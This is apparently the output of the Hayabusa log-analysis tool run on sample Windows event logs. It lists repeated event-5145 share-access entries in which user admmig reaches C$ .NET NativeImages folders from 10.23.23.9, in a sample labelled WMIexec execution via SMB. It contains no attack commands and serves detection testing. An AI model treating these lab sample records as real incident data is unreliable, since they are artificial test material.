10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 